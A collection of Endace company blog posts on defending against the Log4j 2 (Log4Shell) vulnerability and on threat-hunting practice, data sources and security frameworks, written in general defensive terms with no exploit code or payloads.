Endace Packet Forensics Files: Episode #35

Original Entry by : Michael Morris

Michael talks to Timothy Wilson-Johnston, Value Chain Security Leader, Cisco

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, EndaceWhat did we learn from the recent Log4J 2 vulnerability? How are security holes like this changing the way organizations think about deploying enterprise software solutions?

In this episode of the Endace Packet Forensic files Michael Morris talks with Timothy Wilson-Johnston about the Log4J 2 threat and how it is being exploited in the wild.

Timothy shares his thoughts about what Log4J 2 has taught us, and why organizations need to look at the bigger picture:

  • How can you better defend against vulnerabilities of this type
  • Why it’s so important to closely scrutinize solutions that are deployed – and make sure you have visibility into components that might be included with those solutions

Finally, Timothy discusses the importance of evaluating security vs function and why it is critical to have software inspection and validation processes to manage third-party risk to your business. Knowing what your vendors’ standards are and implementing a structured and repeatable process for evaluating vendors and solutions, is key to improving security maturity.

 

Other episodes in the Secure Networks video/audio podcast series are available here.


Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace


Michael Morris, Director of Global Business Development, Endace

Log4J 2 - how can you see if you've been attacked?Many organizations have been scrambling this week to search their networks for instances of any use of Log4j 2 libraries and quickly patch applications, systems, appliances, or devices that might be using them. Lots of cycles are being spent reaching out to equipment and software vendors trying to determine if their systems or applications are potentially impacted and applying fixes and updates to stop potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat?  Apache Log4j 2 Java library is vulnerable to a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. This gives remote unauthenticated attackers the ability to execute arbitrary code loaded from a malicious server with the privileges of the Log4j 2 process.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:

 

Log4J2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for the seeding or running of remote code execution that could then conduct any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams such as Palo Alto Network Unit 42, that discuss the risk, scale, and severity of the potential risks to organizations from this zero-day threat. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability there have already been several compromises and ransomware attacks. However, a lot of the current threat actor activity to this point appears to be reconnaissance and planting of additional malware that can be used later after threat actors have obtained initial access to a network and systems on it.

Our technology partner, KeySight Technology, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere that Log4j 2 is found you need to isolate and investigate for any potential compromises. It’s essential to put in place policies, rules, and filter protections to monitor outbound egress of traffic to unknown IP addresses. Apply filters and pay extra attention to common traffic protocols like LDAP, LDAPS, RMI, DNS as these are key protocols being leveraged for lateral movement and reconnaissance. Look for anomalous or unexpected traffic to and from potentially compromised systems if you are unable to isolate them.

Of course, you should also ensure your IDS’s or firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may have been done.

If you’re collecting network metadata on a SIEM such as Splunk or Elastic, the first place to start looking would be to search all http transactions for strings including JNDI calls. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video of how to use Wireshark to identify and analyze a Log4j2 attack. Well worth watching:

Once you have identified connections that contain the JNDI string you can quickly examine any the subsequent outgoing connections from the affected host to see if successful contact was made with the malicious LDAP server, downloading java malware to infect your server. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have been compromised.

Good luck with the Log4j 2 threat hunting! To learn more about how cost effective and simple it can be to have an always-on network packet capture platform integrated with the rest of your security tools to help you search for Log4J 2 and other zero-day attacks go to www.endace.com.


The Importance of Network Data to Threat Hunting (Part 3)

Original Entry by : Robert Salier

Frameworks and Regulations

By Robert Salier, Product Manager, Endace


Robert Salier, Product Manager, EndaceIn this, the third article in our series on threat hunting (see here for Part 1 and Part 2), we explore the frameworks and regulations most relevant to threat hunting.

These tend to fall into two categories: those that address cybersecurity at a governance level, and those that facilitate insight into individual attacks and help formulate appropriate defense actions.

Governance Level Frameworks and Regulations

The regulatory environment influences threat hunting, and cyber defense in general. In many countries, regulations impose obligations on disclosure of breaches, including what information must be provided, when, and to which stakeholders. This influences the information that an organization needs to know about a breach, and hence its choice of strategies, policies, processes and tools. These regulations generally require companies to disclose a breach to all customers that have been affected. However if an organization cannot ascertain which customers were affected, or even if any customers were affected, then they may need to contact every customer. The only thing worse than having to disclose a breach is having to disclose a breach without being able to provide the details your customers expect you to know.

There are a also a number of frameworks addressing cybersecurity at the governance level, which in some cases overlap with regulations, dealing with many of the same issues and considerations. Collectively, these frameworks and regulations help to ensure organizations implement good strategies, policies, processes and tools, e.g. …

  • Which systems and data is most important to the organization
  • What Information security policies should be in place
  • How cybersecurity should be operationalized (e.g. what organizational structure, security architecture and systems are most appropriate for the organization)
  • Incident management processes
  • Best practice guidelines

Prevalent frameworks and regulations include…

  • ISO 27000 Series of Information Security Standards
    A comprehensive family of standards for information security management, providing a set of best practices for information security management. Maintained by the International Standards Organization, it has been broadly adopted around the globe.
  • NIST Special Publication 800-53
    A catalogue of security and privacy controls for all U.S. federal organizations except those related to national security.
  • NIST Cybersecurity Framework
    A policy framework for private sector organizations to assess and improve their ability to prevent, detect, and respond to cyber attacks. It was developed for the USA, but has been adopted in a number of countries.
Frameworks to Characterize Attacks and Facilitate Responses

A number of frameworks have been developed to help describe and characterize attacker activity, and ultimately facilitate defense strategies and tactics.

Prevalent frameworks include…

  • Cyber Kill Chain
    Developed by Lockheed Martin, this framework was developed from a “kill chain” framework developed for military attack and defense. It decomposes a cyber attack into seven generic stages, providing a framework for characterizing and responding to attacks. Refer to this Dark Reading article for some discussion on the benefits and limitations of this framework.
  • Diamond Model
    This model describes attacks decomposing an attack into four key aspects, i.e. details of the adversary, their capabilities, the infrastructure they used, and the victim(s). Multiple attack diamonds can be plotted graphically in various ways including timelines and groupings, facilitating deeper insight.
  • Mitre Att&ck
    Developed by Mitre, Att&ck stands for “Adversarial Tactics, Techniques, and Common Knowledge”. It is essentially a living, growing knowledge base capturing intelligence gained from millions of attacks on enterprise networks. It consists of a framework that decomposes a cyber attack into eleven different phases, a list of techniques used in each phase by adversaries, documented real-world use of each technique, and a list of known threat actor groups. Att&ck is becoming increasingly popular, used by and contributed to by many security vendors and consultants.
  • OODA Loop
    Describes a process cycle of “Observe – Orient – Decide – Act”. Originally developed for military combat operations, it is now being applied to commercial operations.

The Importance of Network Data to Threat Hunting (Part 2)

Original Entry by : Robert Salier

Threat Hunting in Practice

By Robert Salier, Product Manager, Endace


Robert Salier, Product Manager, EndaceHunting for security threats involves looking for traces of attackers in an organization’s IT environment, both past and present. It involves creativity combined with (relatively loose) methodologies and frameworks, focused on outsmarting an attacker.

Threat Hunting relies on a deep knowledge of the Tactics, Techniques and Procedures (TTP’s) that adversaries use, and a thorough knowledge of the organization’s IT environment. Well executed threat hunts provide organizations with deeper insight into their IT environment and into where attackers might hide.

This, the second article in our series of blog posts on threat hunting (read Part 1 here), looks at how leading organizations approach threat hunting, and the various data, resources, systems, and processes required to threat hunt effectively and efficiently.

Larger organizations tend to have higher public profiles, more valuable information assets, and complex and distributed environments that present a greater number of opportunities for criminals to infiltrate, hide, and perform reconnaissance without detection. When it comes to seeking out best practice, it’s not surprising that large organizations are the place to look.

Large organizations recognize that criminals are constantly looking for ways to break in undetected and that it is only a matter of time before they succeed if they haven’t already. While organizations of all sizes are being attacked, larger organizations are the leaders in this proactive approach to hunting down intruders, i.e. “threat hunting”. They have recognized that active threat hunting increases detection rates over-relying on incident detection alone – i.e. waiting for alerts from automated intrusion detection systems that may never come.

Best practice involves formulating a hypothesis about what may be occurring, then seeking to confirm it. There are three general categories of hypothesis:

  • Driven by threat intelligence from industry news, reports, and feeds.
    e.g. newsfeeds report a dramatic increase in occurrences of a specific ransomware variant targeting your industry. So a threat hunt is initiated with the hypothesis that your organization is being targeted with this ransomware
  • Driven by situational awareness, i.e. focus on infrastructure, assets and data most important to the organization.
    e.g. a hypothesis that your customers’ records are the “crown jewels”, so hackers will be trying to gain access to exfiltrate this data

Having developed a hypothesis as a starting point, leading organizations rely on a range of tools and resources to threat hunt efficiently and effectively:

Historic Data from Hardware, Software and the Network
  • Infrastructure Logs from the individual components of hardware and software that form your IT environment, e.g. firewalls, IDS, switches, routers, databases, and endpoints. These logs capture notable events, alarms and other useful information, which when pieced together can provide valuable insight into historic activity in your environment. They’re like study notes that you take from a text book, i.e. highly useful, but not a full record, just a summary of what is considered notable. Also, be wary that hackers often delete or modify logs to remove evidence of their malicious activity.
  • Summarized network data (a.k.a. “packet metadata”, “network telemetry”). Traffic on network links can be captured and analyzed in real time to generate a feed of summary information characterizing the network activity. The information that can be obtained goes well beyond the flow summaries that Netflow provides, e.g. by identifying and summarizing activity and anomalies up to and including layer 7 such as email header information and expired certificates. This metadata can be very useful in hunts and investigations, particularly to correlate network traffic with events and activity from infrastructure logs, and users. Also, unlike logs, packet metadata cannot be easily deleted or modified.
  • Packet level network history. By capturing and storing packets from a network link, you have a verbatim copy of the communication over that link, allowing you to see precisely what was sent and received, with zero loss of fidelity. Some equipment such as firewalls and IDS’s capture small samples of packets, but these capture just a fraction of a second of communications, and therefore must be automatically triggered by a specific alarm or event. Capturing and storing all packets (“full packet capture”, “100% packet capture”) is the only way to obtain a complete history of all communications. Historically, the barriers to full packet capture have been the cost of the required storage and the challenge of locating the packets of interest, given the sheer volume of data. However, recent advances in technology are now breaking down those barriers.
Baselines

Baselines are an understanding of what is normal and what is anomalous.
Threat hunting involves examining user, endpoint, and network activity, searching for IoA’s and IoC’s – i.e. “clues” pointing to possible intrusions and malicious activity. The challenge is knowing which activity is normal, and which is anomalous. Without knowing that, in many cases, you will not know whether certain activity is to be expected in your environment, or whether it should be investigated.

A Centralized Location for Logs and Metadata

Because there are so many disparate sources of logs, centralized collection and storage is a practical necessity for organizations with substantial IT infrastructure. Most organizations use a SIEM (Security Information and Event Manager), which may have a dedicated database for storage of logs and metadata, or may use an enterprise data lake. SIEMs can correlate data from multiple sources, support rule-based triggers, and can feature Machine Learning algorithms able to learn what activity is normal (i.e. “baselining”). Having learned what is normal, they can then identify and flag anomalous activity.

Threat Intelligence

Threat intelligence is knowledge that helps organizations protect themselves against cyber attacks. It encompasses both business level and technical level detail. At a business level this includes general trends in malicious activity, individual breaches that have occurred, and how organizations are succeeding and failing to protect themselves. At a technical level, threat intelligence provides very detailed information on how individual threats work, informing organizations how to detect, block, and remove these threats. Generally this comes in the form of articles intended for consumption by humans, but also encompasses machine-readable intelligence that can be directly ingested by automated systems, e.g. updates to threat detection rules.

Frameworks and Regulations

The regulatory environment influences threat hunting, and cyber defense in general. In many countries, regulations impose obligations on disclosure of breaches, including what information must be provided, when, and to which stakeholders. There are a also a number of frameworks addressing cyber security at the governance level, which in some cases overlap with regulations, dealing with many of the same issues and considerations. Collectively, these frameworks and regulations help to ensure organizations implement good strategies, policies, processes and tools.

In the next article in this series, we explore the frameworks and regulations that apply to threat hunting, and which ensure organizations implement appropriate strategies, policies, processes and tools.


The Importance of Network Data to Threat Hunting (Part 1)

Original Entry by : Robert Salier

Introduction to Threat Hunting

By Robert Salier, Product Manager, Endace


Robert Salier, Product Manager, EndaceCriminal hackers are stealthy. They put huge efforts into infiltrating without triggering intrusion detection systems or leaving traces in logs and metadata … and often succeed. So you need to actively go searching for them. That’s why SecOps teams are increasingly embracing threat hunting.

This is the first in a series of blog articles where we discuss various aspects of threat hunting, and how visibility into network traffic can increase the efficiency and effectiveness of threat hunting. This visibility is often the difference between detecting an intruder, or not, and collecting the conclusive evidence you need to respond to an attack, or not.

In December 2015 Ukraine suffered from a power grid cyber attack that disrupted power distribution to the nation’s citizens. Thirty substations were switched off and damaged leaving 230,000 without power.

This attack was meticulously planned and executed, with the attackers having first gained access over six months before they finally triggered the outage. There were many stages of intrusion and attack, leaving traces that were only identified in subsequent investigations. Well planned and executed threat hunting would probably have uncovered this intruder activity, and averted the serious outages that took place.

This is a good example of why, in the last few years, threat hunting has been gaining substantial momentum and focus amongst SecOps teams, with increasing efforts to better define and formalize it as a discipline. You’ll see a range of definitions with slightly different perspectives, but the following captures the essence of Threat Hunting:

The process of proactively and iteratively searching through IT infrastructure to detect and isolate advanced threats that evade existing security solutions.

There’s also some divergence in approaches to threat hunting, and in the aspects that individual organizations consider most important, but key themes are:

  • To augment automated detection, increasing the likelihood that threats will be detected.
  • To provide insight into attackers’ Tactics, Techniques and Procedures (TTP’s) and hence inform an organization where they should focus their resources and attention.
  • To identify if, and where, automated systems need updating – e.g. with new triggers.

So, threat hunting involves proactively seeking out attacks on your IT infrastructure that are not detected by automated systems such as Intrusion Detection Systems (IDSs), firewalls, Data Leakage Prevention (DLP) and Endpoint Detection and Response (EDR) solutions. It’s distinct from incident response, which is reactive. It may, however, result in an incident response being triggered.

Although threat hunting can be assisted by machine-based tools, it is fundamentally an activity performed by people, not machines, heavily leveraging human intelligence, wisdom and experience.

In the next article, we explore how leading organizations approach threat hunting, and the various data, resources, systems, and processes required to threat hunt effectively and efficiently.

In the meantime, feel free to browse the Useful References page in our Theat Hunting Section on endace.com, which contains both a glossary and useful links to various pages related to threat hunting. Below are some additional useful references.

References

(1) Threat Hunting Report (Cyber Security Insiders), p22

(2) 2018 Threat Hunting Survey Results (SANS), p13

(3) 2018 Threat Hunting Survey Results (SANS), p5

(4) Improving the Effectiveness of the Security Operations Center (Ponemon Institute), p10

(5) The Ultimate Guide To Threat Hunting, InfoSec Institute